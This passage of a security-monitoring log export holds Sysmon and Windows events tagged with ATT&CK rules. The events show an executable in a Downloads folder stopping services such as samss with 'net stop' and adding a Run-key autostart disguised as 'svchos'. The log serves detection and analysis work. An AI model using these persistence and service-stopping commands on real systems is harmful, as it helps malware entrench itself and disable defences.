""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-d184-5ec7-0000-00105e272100} +ParentProcessId: 39604 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\sQCMgCG.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:06.013837900Z"",""eventRecordID"":""1085"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:06.011\r\nProcessGuid: {df9fc3d3-d186-5ec7-0000-00107e962100}\r\nProcessId: 42832\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John 
Williams\\Downloads\\sQCMgCG.exe\"" /f\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-d184-5ec7-0000-00105e272100}\r\nParentProcessId: 39604\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\sQCMgCG.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:06.011"",""processGuid"":""{df9fc3d3-d186-5ec7-0000-00107e962100}"",""processId"":""42832"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-d184-5ec7-0000-00105e272100}"",""parentProcessId"":""39604"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\sQCMgCG.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:38:10.557",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xfc8 +Faulting application start time: 0x01d6303b578d1d2e +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 4f923674-84bd-4ac6-b470-6cc2e5763025 +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""",, +"May 23, 2020 @ 12:38:05.475",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff75b59e38d +Faulting process id: 0xd08 +Faulting application start time: 0x01d6303b4d942d6b +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 31dbde77-5b08-4977-9049-74aa3437b70e +Faulting package 
full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:37:54.005",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:19:45.444 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00} +ProcessId: 8244 +Image: C:\Windows\system32\reg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\svchos +Details: C:\Users\John Williams\Downloads\progam18.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.463405100Z"",""eventRecordID"":""1063"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:19:45.444\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00}\r\nProcessId: 8244\r\nImage: C:\\Windows\\system32\\reg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchos\r\nDetails: C:\\Users\\John Williams\\Downloads\\progam18.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:19:45.444"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010d0af1c00}"",""processId"":""8244"",""image"":""C:\\\\Windows\\\\system32\\\\reg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\svchos"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe""}}}" +"May 23, 2020 @ 12:37:53.998",10,"ATT&CK T1060: Direct Autorun Keys 
Modification","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.355 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00} +ProcessId: 8244 +Image: C:\Windows\System32\reg.exe +FileVersion: 10.0.18362.476 (WinBuild.160101.0800) +Description: Registry Console Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: reg.exe +CommandLine: REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\progam18.exe"" /f +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-00108e7f1c00} +ParentProcessId: 6372 +ParentImage: C:\Windows\System32\cmd.exe +ParentCommandLine: ""C:\Windows\System32\cmd.exe"" /C REG ADD ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""svchos"" /t REG_SZ /d ""C:\Users\John Williams\Downloads\progam18.exe"" /f""","REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.386698100Z"",""eventRecordID"":""1062"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 
13:19:45.355\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010d0af1c00}\r\nProcessId: 8244\r\nImage: C:\\Windows\\System32\\reg.exe\r\nFileVersion: 10.0.18362.476 (WinBuild.160101.0800)\r\nDescription: Registry Console Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: reg.exe\r\nCommandLine: REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-00108e7f1c00}\r\nParentProcessId: 6372\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\cmd.exe\"" /C REG ADD \""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"" /v \""svchos\"" /t REG_SZ /d \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" /f\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.355"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010d0af1c00}"",""processId"":""8244"",""image"":""C:\\\\Windows\\\\System32\\\\reg.exe"",""fileVersion"":""10.0.18362.476 (WinBuild.160101.0800)"",""description"":""Registry Console Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""reg.exe"",""commandLine"":""REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\"" /f"",""currentDirectory"":""C:\\\\Users\\\\John 
Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=601BDDF7691C5AF626A5719F1D7E35F1,SHA256=4ED2A27860FA154415F65452FF1F94BD6AF762982E2F3470030C504DC3C8A354,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-00108e7f1c00}"",""parentProcessId"":""6372"",""parentImage"":""C:\\\\Windows\\\\System32\\\\cmd.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\cmd.exe\\\"" /C REG ADD \\\""HKEY_CURRENT_USER\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\"" /v \\\""svchos\\\"" /t REG_SZ /d \\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\"" /f""}}}" +"May 23, 2020 @ 12:37:53.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.169 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-0010e2a91c00} +ProcessId: 7844 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00} +ParentProcessId: 6592 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.187026600Z"",""eventRecordID"":""1059"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:45.169\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-0010e2a91c00}\r\nProcessId: 7844\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00}\r\nParentProcessId: 6592\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.169"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-0010e2a91c00}"",""processId"":""7844"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-001030831c00}"",""parentProcessId"":""6592"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:37:53.946",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:45.184 +ProcessGuid: {df9fc3d3-d171-5ec7-0000-00108aaa1c00} +ProcessId: 7860 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00} +ParentProcessId: 4060 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:45.188295700Z"",""eventRecordID"":""1060"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:45.184\r\nProcessGuid: {df9fc3d3-d171-5ec7-0000-00108aaa1c00}\r\nProcessId: 7860\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00}\r\nParentProcessId: 4060\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:45.184"",""processGuid"":""{df9fc3d3-d171-5ec7-0000-00108aaa1c00}"",""processId"":""7860"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d170-5ec7-0000-0010b1951c00}"",""parentProcessId"":""4060"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:37:53.036",10,"Multiple Windows error Application events","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. 
+] """,, +"May 23, 2020 @ 12:37:53.027",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.611 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00} +ProcessId: 4060 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.613491000Z"",""eventRecordID"":""1058"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.611\r\nProcessGuid: {df9fc3d3-d170-5ec7-0000-0010b1951c00}\r\nProcessId: 4060\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:44.611"",""processGuid"":""{df9fc3d3-d170-5ec7-0000-0010b1951c00}"",""processId"":""4060"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:37:53.000",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-22 13:19:44.288 +ProcessGuid: {df9fc3d3-d170-5ec7-0000-001030831c00} +ProcessId: 6592 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:44.362993400Z"",""eventRecordID"":""1057"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:44.288\r\nProcessGuid: 